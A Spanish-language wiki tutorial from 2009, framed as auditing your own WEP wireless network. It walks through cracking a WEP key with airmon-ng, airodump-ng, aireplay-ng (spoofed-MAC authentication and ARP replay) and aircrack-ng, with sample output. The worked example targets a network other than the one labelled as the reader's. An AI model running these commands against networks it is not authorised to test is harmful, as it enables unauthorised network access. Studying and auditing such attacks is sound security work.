[[Como auditar la seguridad de tu red inalambrica]]
 
Traza: » punto_de_acceso_inalambrico » backupninja » Como auditar la seguridad de tu red inalambrica
Tu estás aquí: acervo.org » Como auditar la seguridad de tu red inalambrica
Tabla de Contenidos

Como auditar la seguridad de tu red inalambrica

Este tutorial sirve para auditar la seguridad de tu red con claves WEP.

Elementos:

  1. Descargar el CD Live de Backtrack 3 http://www.remote-exploit.org/backtrack_download.html o instala los paquetes para tu distrobucion de linux. en debian unicamente si requiere del paquete “aircrack-ng”.
  2. Estas indicaciones son para la tarjeta de red esterna PCMCIA Airlink con el chip Atheros. tambien funcionan los realtech
  3. Estar lo mas cerca posible del emisor de señal.

Pasos:

Iniciar el Bactrack 3 en Live Cd

En el caso que utilizas Backtrack, reinicias tu computadora con el disco de backtrack 3 adentro

Habilitar el modo monitor

Abrir una consola y escribir los siguientes comando para habilitar tu tarjeta en modo monitor 

airmon-ng stop ath0

así paramos el interfaz de monitoreo. es un precación que puede ser inecesario. asumimos que el interfaz de monitoreo es ath0. 

airmon-ng start wifi0

cambia wifi0 para el interfaz de tu tarjeta. este orden nos dará algo como el siguiente: 

wifi0		Realtek 8187L	rtl8187 - [phy2]
			(monitor mode enabled on ath0)

cambiará segun tu tarjeta y manejador. el ultimo frase, entre parethesis nos da el nombre del disponitivo de monitoreo que utilizamos en el resto del tutorial.

Detectar redes tráfico

El siguiente paso es detectar tus redes y el trafico 

airodump-ng ath0

Debe de salir la dirección de un AP (BSSID), el canal (CH) el tipo de cifración (ENC)1) y el nombre de la red (ESSID) como puedes ver: 

CH 11 ][ Elapsed: 35 mins ][ 2009-01-15 18:14                                         
                                                                                        
BSSID              PWR  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID
                                                                                           
00:1D:68:F7:2F:40   23     2105       17    0   1  54  WEP  WEP         INFINITUMXYZ    
00:40:96:42:6F:D9   18     2103     1778    0  11  11  WEP  WEP         mi_red       
00:0D:72:79:29:C1   12     1035      393    0   6  22. WEP  WEP         SUPREMO               
00:14:95:70:5A:A1    7      868        0    0   6  54. OPN              2WIRE548

Una vez encontrada la red cancelas la orden con ctrl-C. corremos de nuevo airodump-ng pero ahora epscificando el canal, nombre del AP (punto de acesso) y nombre del archivo en lo cual guardar los vectores de initialización (IVs). 

airodump-ng -w [nombredearchivo] -c [número de canal] -i -d [BSSID] ath0

tomando el ejemplo de “2WIRE548” seria asi: 

  airodump-ng -w 2WIRE548 -c 6 -i -d 00:14:95:70:5A:A1 ath0

A continuación saldra el trafico de tu red y los paquetes detectados al archivo que especificamos con el opcion ”-w”: “22WIRE548.ivs”. los otros opciones son -c,el numero de canal, -i, unicamente captura IVs y -d, limitamos el escaneo al BSSID especificado.

dejaremos airodump-ng en su proprio ventana, y abrimos otro terminal para seguir con aireplay-ng.

Aireplay

Vamos a authenticarnos con nuestra AP y luego empezar de enviar peticiones ARP. esto incrementara el numero de IVs que capturamos con airodump-ng.

Para la authenicacion, abres otra consola y escibes el siguiente comando 2) 

aireplay-ng -1 0 -e [ESSID] -a [BSSID] -h [dirección MAC] ath0

el “ESSID” y “BSSID” obtenemos del airodump-ng. el “dirección MAC” es lo mismo que el punto 3, esconde el direccion fisica de nuestra tarjeta. así que puedemos poner lo que queremos. si no tienes idea, copia y pega el siguiente en su lugar: 

00:11:22:33:44:55

Si todo va bien veremos algo así: 

Sending Authentication Request (Open System) [ACK]
Authentication successful
Sending Association Request [ACK]
Association successful :-) (AID: 1)

vemos que la programa cambia el MAC de nuestra tarjeta: 

The interface MAC (xx:xx:xx:xx:xx) doesn't match the specified MAC (-h).
    ifconfig ath0 hw ether 00:11:22:33:44:55

Si ves el siguiente es porque tu tarjeta inalambrica no esta en la misma “canal” que el AP a que estas intentando aceder: 

ath0 is on channel X, but the AP uses channel Y

asi que asegurate que corriste airodump-ng con el opcion -c, como vimos arriba. el opcion ”-c” de airodump-ng, el numero de canal, seria lo del AP, o sea el valor de “Y”.

Asumiendo que recibimos el mensaje “Association successful :-) (AID: 1)”, procedemos al siguiente paso y empezamos enviar los peticiones ARP al AP. 

aireplay-ng -3 -b [BSSID] -h [dirección MAC] ath0

veremos algo parecido al siguiente: 

Waiting for beacon frame (BSSID: xx:xx:xx:xx:xx) on channel 6
Saving ARP requests in replay_arp-0115-162015.cap
You should also start airodump-ng to capture replies.
Read 326767 packets (got 39682 ARP requests and 192212 ACKs), sent 201987 packets...(500 pps)

ahora podemos ver en airodump-ng que empiezan a subir el numero de ”#/s”

Aircrack

Después de esperar un rato a que se acumulen los paquetes (dependiendo de lo cerca que este de la señal y del uso de la red) escribes en otra consola lo siguiente para ver el nombre del archivo guardadop con -w: 

ls *.ivs

Si esta el archivo con el nombre que le asignaste escribes: 

aircrack-ng nombredelarchivoconterminacion.ivs

y te saldra la clave Si quieres ser mas especifico puedes escribir uno de los siguientes comandos 

aircrack-ng -b [BSSID] nombredelarchivoconterminacion.ivs

veremos algo parecido al eso: 

                                      Aircrack-ng 1.0 rc1
                      [00:00:58] Tested 1572865 keys (got 13971 IVs)
 KB    depth   byte(vote)
  0    0/  1   74(20992) 36(19640) B1(18872) 07(18652) 2D(18324) 00(18140) 
  1    0/  1   D9(21724) B9(18688) 34(18212) 18(18176) 37(18176) B4(17920) 
  2    0/  2   02(19164) E0(18908) 42(18652) 43(18540) 47(18432) 26(18176) 
  3    0/  1   6B(20992) 52(19492) 57(19128) AA(18944) F2(18836) CF(18468) 
  4    0/  1   79(21576) FD(17992) 79(17920) D3(17812) EE(17812) 6A(17700) 
  5    0/  1   80(20992) 21(18908) 87(18908) AF(17920) 5B(17884) 04(17628) 
  6    0/  1   0A(19748) 3B(18360) B1(18360) 99(17920) B6(17920) 6A(17884) 
  7    1/  7   32(18540) 6F(18396) 3E(18032) D6(17956) C8(17736) D0(17700) 
  8    0/  1   A1(20076) 10(19420) 18(18944) 38(18944) 41(18616) 08(18176) 
  9    0/  1   B8(19676) BF(18652) 27(18504) 0F(17736) 8D(17664) F2(17664) 
 10    1/  1   F2(19236) 2C(18872) E3(18432) A5(18176) E8(17776) ED(17664) 
 11    4/  1   44(17956) 1C(17884) CF(17848) 9D(17628) B0(17628) EC(17628) 
 12    0/  1   47(19164) 47(18836) 9D(18836) 8F(18688) 8B(18396) 2D(18140)

la programa nos dice cuantos IVs esta en el archivo .ivs. 

(got 13971 IVs)

hay que correr aircrack-ng cada rato, esperando que hay sufecientes IVs. por lo general aircrack-ng requiere de 20 mil o más.

cuando encuentra la clave, nos dirá: 

KEY FOUND! [ AE:66:5C:FD:24:E3:92:A9:14:39:D4:27:4B ]

Fuentes Adicionales

1) WEP, WPA o, si es abierto, OPN
2) no es siempre necesario esto paso, entonces si recibimos “Association denied” de todas maneras intentamos con el comando de aireplay-ng que sigue
 
auditar_redes_inalambricas.txt · Última modificación: 2009/08/21 13:32 por ashitaka
 
Recent changes RSS feed Creative Commons License Donate Powered by PHP Valid XHTML 1.0 Valid CSS Driven by DokuWiki